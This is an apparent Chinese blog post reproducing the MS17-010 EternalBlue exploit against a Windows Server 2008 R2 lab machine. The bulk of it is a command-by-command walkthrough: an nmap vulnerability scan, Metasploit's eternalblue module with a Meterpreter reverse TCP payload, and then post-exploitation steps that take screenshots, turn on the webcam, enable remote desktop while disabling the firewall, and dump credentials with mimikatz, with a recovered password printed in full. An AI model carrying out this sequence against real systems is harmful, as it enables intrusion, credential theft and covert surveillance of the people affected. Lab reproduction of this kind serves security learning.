猫宁!!!
参考:
“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限,危害极大。
微软的漏洞2个漏洞公告
windows 2008R2镜像从itellme站点获取,种类齐全,比较干净。
文章图片
记得进行新建,建立系统保留分区哦,用于存放系统引导文件,类似于centos7的/boot分区,可以避免系统无法正常启动。
文章图片
虚拟机中的Windows 2008 R2一定要设置为网卡桥接模式
ip是192.168.100.27,先用nmap扫描一下有没有永恒之蓝漏洞存在,扫描脚本在/usr/share/nmap/scripts/
文章图片
nmap --script smb-vuln-ms17-010.nse 192.168.100.27,表明开启了445端口,存在漏洞。
文章图片
msfconsole,启动MSF
search ms17_010
文章图片
use auxiliary/scanner/smb/smb_ms17_010,使用POC进行扫描
set RHOST 192.168.100.27
run
证实存在漏洞
文章图片
use exploit/windows/smb/ms17_010_eternalblue
set RHOST 192.168.100.27
run
竟然把服务器给打重启了,没有连接上去
文章图片
文章图片
show payloads,看一下更多种类的payload,46个
文章图片
show targets,显示适用的目标
文章图片
use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/reverse_tcp,这个payload非常有助于后期的植入后门进行权限维持。
set RHOST 192.168.100.27
run
成功进入服务器系统
文章图片
文章图片
screenshot,截屏
文章图片
webcam_scream,可以开启摄像头
run post/windows/manage/enable_rdp,开启远程桌面并关闭防火墙
文章图片
文章图片
shell,直接进入系统
文章图片
load mimikatz,加载密码读取工具
wdigest,成功获取我的密码
文章图片
rdesktop 192.168.100.27 -u Administrator -p 111aaabbb!!!
远程连接服务器就好了
arp查看内网情形
【php|php ms17-010,PJzhang:ms17-010永恒之蓝漏洞在windows 2008R2中的复现】
文章图片
获得当前木马进程,getid
文章图片
ps查看
文章图片
获取用户的身份和权限
文章图片
判断服务器是不是被人在使用
文章图片
run和bgrun,有大量的帮助文件
文章图片
sysinfo,显示计算机信息
文章图片
推荐阅读
- 反序列化|PHP反序列化漏洞总结
- javascript|HTML之body标签中的相关标签
- 语言|网页开发语言
- 语言|几种主流网页开发语言的思考 [转]
- web|[RoarCTF 2019]Easy Calc_WP
- CTF日记|[GXYCTF2019]BabySQli
- CTF日记|[BJDCTF2020]EzPHP&DASCTF-sep:hellounser
- php|php 怎么使用 composer,php composer 使用
- 比赛wp|[SCTF2021]Upload_it_1复现闭包组件反序列化rce